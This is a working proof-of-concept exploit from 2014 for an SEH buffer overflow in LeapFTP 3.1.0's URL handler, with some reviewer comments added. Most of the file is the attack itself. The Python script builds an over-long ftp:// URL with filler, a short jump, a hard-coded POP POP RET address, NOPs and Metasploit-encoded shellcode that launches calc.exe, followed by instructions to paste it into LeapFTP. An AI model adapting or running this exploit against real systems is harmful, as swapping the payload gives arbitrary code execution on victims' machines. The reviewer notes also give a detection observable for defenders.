# Exploit Title: LeapFTP 3.1.0 URL Handling SEH Exploit
# Google Dork: "k3170makan is totally awesome" hehehe
# Date: 2014-08-28
# Exploit Author: k3170makan
# Vendor Homepage: http://www.leapware.com/
# Software Link: http://www.leapware.com/download.html
# Version: 3.1.0
# Tested on: Windows XP SP0 (DoS on Windows SP2, Windows 7)
# Timeline:
# * 2014-08-28 : Initial disclosure
# * 2014-09-01 : no contact
# * 2014-09-01 : public disclosure
"""
This vulnerability was disclosed according to the terms of my public disclosure policy ( http://blog.k3170makan.com/p/public-disclosure-policy.html)
"""
# NOTE(review): what this script does, as written below — it builds a single
# file, exploit.txt, holding one over-long ftp:// URL: "ftp://", 1093 filler
# bytes, a 4-byte short jump, a 4-byte fixed address the author labels
# POP POP RET, 30 NOP bytes, and an encoded payload that the author's
# msfencode line says is windows/exec with CMD=calc.exe. The header reports
# code execution only on Windows XP SP0 and a crash (DoS) on XP SP2 and
# Windows 7, so the hard-coded address is tied to one platform build.
# NOTE(review): from a detection standpoint, the observable is an ftp:// URL
# of more than ~1.1 KB (mostly repeated 'A' bytes) handed to the LeapFTP URL
# handler; the script itself only writes a local file and does no network
# or process activity.
from sys import argv  # NOTE(review): argv is imported but never used; the script takes no arguments.
if __name__ == "__main__":
    # Byte offset from the start of the URL body to the overwritten SEH
    # record, per the author; the two 4-byte writes below presumably fill
    # the next-SEH and handler fields (SEH overwrite per the title — not
    # re-verified here).
    ovTrigger = 1093
    f = open("exploit.txt","w")  # text-mode handle; written only, never read back
    f.write("ftp://")
    f.write("A"*ovTrigger)  # filler up to the SEH record
    f.write("\xEB\x06\x90\x90") #JMP to payload
    f.write("\x44\xD3\x4A\x77") #POP POP RET
    # 30 NOPs (0x90); the module the fixed address above belongs to is not
    # stated on this page.
    f.write("\x90"*30)
    #msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/alpha_mixed -c 1 -b \x00\x0a\x0d\xff
    # Alphanumeric-mixed encoded payload; the bad-byte list in the command
    # above (\x00 \x0a \x0d \xff) is what the encoder was told to avoid.
    shellcode = "\x89\xe0\xd9\xe8\xd9\x70\xf4\x5f\x57\x59\x49\x49\x49\x49" +\
    "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" +\
    "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" +\
    "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +\
    "\x42\x75\x4a\x49\x49\x6c\x68\x68\x4f\x79\x35\x50\x53\x30" +\
    "\x45\x50\x35\x30\x6e\x69\x79\x75\x30\x31\x6a\x72\x30\x64" +\
    "\x4c\x4b\x53\x62\x56\x50\x4e\x6b\x76\x32\x56\x6c\x6c\x4b" +\
    "\x42\x72\x62\x34\x6e\x6b\x54\x32\x46\x48\x76\x6f\x6e\x57" +\
    "\x61\x5a\x67\x56\x45\x61\x39\x6f\x64\x71\x4b\x70\x4e\x4c" +\
    "\x55\x6c\x53\x51\x33\x4c\x67\x72\x76\x4c\x51\x30\x59\x51" +\
    "\x38\x4f\x64\x4d\x45\x51\x49\x57\x4d\x32\x58\x70\x56\x32" +\
    "\x70\x57\x4e\x6b\x31\x42\x76\x70\x4e\x6b\x61\x52\x47\x4c" +\
    "\x73\x31\x5a\x70\x4c\x4b\x57\x30\x53\x48\x6c\x45\x4f\x30" +\
    "\x33\x44\x51\x5a\x65\x51\x48\x50\x42\x70\x6e\x6b\x72\x68" +\
    "\x67\x68\x6c\x4b\x30\x58\x47\x50\x77\x71\x5a\x73\x49\x73" +\
    "\x77\x4c\x71\x59\x6e\x6b\x35\x64\x4e\x6b\x57\x71\x4b\x66" +\
    "\x35\x61\x4b\x4f\x34\x71\x4f\x30\x4e\x4c\x59\x51\x4a\x6f" +\
    "\x74\x4d\x75\x51\x58\x47\x44\x78\x59\x70\x62\x55\x68\x74" +\
    "\x33\x33\x61\x6d\x4b\x48\x65\x6b\x33\x4d\x47\x54\x72\x55" +\
    "\x58\x62\x36\x38\x6e\x6b\x32\x78\x35\x74\x55\x51\x4a\x73" +\
    "\x73\x56\x4e\x6b\x66\x6c\x72\x6b\x6e\x6b\x71\x48\x77\x6c" +\
    "\x47\x71\x78\x53\x6e\x6b\x73\x34\x4e\x6b\x75\x51\x5a\x70" +\
    "\x4b\x39\x77\x34\x35\x74\x71\x34\x31\x4b\x51\x4b\x75\x31" +\
    "\x71\x49\x70\x5a\x66\x31\x4b\x4f\x39\x70\x43\x68\x43\x6f" +\
    "\x53\x6a\x4c\x4b\x42\x32\x38\x6b\x4b\x36\x53\x6d\x42\x4a" +\
    "\x36\x61\x4c\x4d\x4b\x35\x68\x39\x65\x50\x35\x50\x55\x50" +\
    "\x70\x50\x52\x48\x76\x51\x6c\x4b\x62\x4f\x6c\x47\x79\x6f" +\
    "\x6e\x35\x6f\x4b\x4a\x50\x4e\x55\x69\x32\x32\x76\x55\x38" +\
    "\x79\x36\x6c\x55\x6f\x4d\x4d\x4d\x6b\x4f\x78\x55\x75\x6c" +\
    "\x73\x36\x31\x6c\x57\x7a\x4b\x30\x79\x6b\x49\x70\x70\x75" +\
    "\x64\x45\x4f\x4b\x63\x77\x37\x63\x62\x52\x52\x4f\x52\x4a" +\
    "\x77\x70\x56\x33\x69\x6f\x4e\x35\x30\x63\x35\x31\x50\x6c" +\
    "\x51\x73\x36\x4e\x45\x35\x44\x38\x33\x55\x53\x30\x41\x41"
    f.write(shellcode)
    f.flush()
    f.close()  # explicit close; the file is not opened with a context manager
#copy contents of exploit.txt to your clipboard and then launch LeapFTP
# <http://about.me/k3170makan> Keith Makan <http://about.me/k3170makan> about.me/k3170makan <http://about.me/k3170makan>